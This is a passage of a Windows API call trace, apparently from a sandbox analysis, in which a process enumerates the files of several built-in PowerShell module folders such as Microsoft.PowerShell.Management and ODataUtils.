lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0264.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.929] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.929] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0264.929] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d [0264.929] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db140 [0264.929] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.930] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0264.930] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0264.930] FindClose (in: hFindFile=0x1a8db140 | out: hFindFile=0x1a8db140) returned 1 [0264.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.930] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20 [0264.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.930] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0264.931] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53 [0264.931] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.931] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.931] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0264.931] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0264.931] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.932] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0264.932] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53 [0264.932] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.932] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.932] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0264.932] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.933] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.933] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0264.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.933] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.933] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0264.933] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53 [0264.933] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db020 [0264.933] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.934] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0264.934] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0264.934] FindClose (in: hFindFile=0x1a8db020 | out: hFindFile=0x1a8db020) returned 1 [0264.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.934] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0264.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.934] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0264.934] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0264.934] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.935] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.935] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.935] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0264.935] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0264.935] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0264.936] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0264.936] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0264.936] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0264.936] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.936] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0264.936] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0264.937] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db080 [0264.937] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.937] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.938] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0264.938] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0264.938] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, 